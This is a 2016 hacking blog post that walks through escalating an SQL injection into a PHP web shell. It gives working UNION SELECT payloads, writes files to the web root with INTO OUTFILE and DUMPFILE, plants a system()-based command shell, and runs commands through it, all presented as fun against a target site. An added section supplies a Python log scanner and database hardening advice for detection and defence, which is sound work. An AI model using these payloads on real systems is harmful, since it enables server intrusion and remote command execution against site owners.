Tuesday, 29 November 2016

SQLi to PHP Shell Upload

Greetings from MasterZombie
This is just a little tip on what you can do if your SQLi vulnerable site doesn't have valuable information in the database.

I am not going to go too deep into every single move but if you have basic knowledge in Web application hacking I think you will understand what I am doing.

First we have our SQL Injection vulnerable site:

Code:
www.target.com/index.php?id=-1 union select 1,2,3--

Now we would like to know the directory we are currently in. We have a great command for this:

Code:
www.target.com/index.php?id=-1 union select 1,2,@@datadir--

Ah, splendid, it outputs: /var/www/html/

Now, what we would like to do is try to save a file on the server, like this:

Code:
www.target.com/index.php?id=-1 union select null,null,'test' INTO OUTFILE '/var/www/html/test.txt'--

To check if this worked, we would go to http://www.target.com/test.txt

If you see an empty document with only the word "test" printed on the screen, then we are good to go.


As for the actual fun, we are now going to upload a simple PHP shell on our target:
Code:
www.target.com/index.php?id=-1 union+select+null,null,'<?php%20@system($_REQUEST["cmd"]);%20?>'+INTO+DUMPFILE+'/var/www/html/shell.php'--

Now we test whether the shell works by visiting it and choosing a command to execute:
Code:
www.target.com/shell.php?cmd=uname -a

You know the deal, if it returns something like:

"Linux target 2.6.18-blablabla #1 SMP Fri Dec 17 13:37:00 2010 i686 athlon i1337 GNU/Linux"

Then it means it worked. 
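
Seen from the server side, every step above leaves a line in the web access log. The following is an added example, not part of the original post: a small Python scanner that flags the path lookup, the INTO OUTFILE/DUMPFILE writes, and any later successful request for a file named in such a write. The log lines are constructed, and the log format, function names and finding labels are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines (Apache combined-log style, trimmed); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Nov/2016:10:00:01 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512
203.0.113.7 - - [29/Nov/2016:10:00:09 +0000] "GET /index.php?id=-1+union+select+1,2,@@datadir-- HTTP/1.1" 200 530
203.0.113.7 - - [29/Nov/2016:10:00:20 +0000] "GET /index.php?id=-1+union+select+null,null,'test'+INTO+OUTFILE+'/var/www/html/test.txt'-- HTTP/1.1" 200 498
203.0.113.7 - - [29/Nov/2016:10:00:25 +0000] "GET /test.txt HTTP/1.1" 200 5
203.0.113.7 - - [29/Nov/2016:10:02:00 +0000] "GET /index.php?id=-1%20union%20select%20null,null,'x'%20INTO%20DUMPFILE%20'/var/www/html/shell.php'-- HTTP/1.1" 200 498
203.0.113.7 - - [29/Nov/2016:10:02:10 +0000] "GET /shell.php?cmd=uname+-a HTTP/1.1" 200 54
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')
WRITE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+['\"]([^'\"]+)['\"]", re.I)
RECON_RE = re.compile(r"\bunion\b.*\bselect\b.*@@(?:datadir|basedir|secure_file_priv)", re.I | re.S)


def normalize(target):
    """Decode twice (catches double encoding), drop /**/ comments, squeeze whitespace."""
    text = unquote_plus(unquote_plus(target))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)


def scan(log_text):
    """Return (client_ip, finding, detail) tuples in log order."""
    findings, written = [], set()  # written: basenames named in SQL file writes
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        decoded = normalize(target)
        write = WRITE_RE.search(decoded)
        name = urlsplit(target).path.rsplit("/", 1)[-1]
        if write:
            written.add(write.group(1).rsplit("/", 1)[-1])
            findings.append((ip, "sql-file-write", write.group(1)))
        elif RECON_RE.search(decoded):
            findings.append((ip, "sql-path-recon", decoded))
        elif name in written and status == "200":
            # A file named in an earlier INTO OUTFILE/DUMPFILE is now served: the write landed.
            findings.append((ip, "written-file-served", name))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The writes these rules look for only succeed when the application's MySQL account holds the FILE privilege and secure_file_priv permits the target directory, so revoking FILE and restricting secure_file_priv closes this path at the database even before the injectable query is fixed with a prepared statement.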
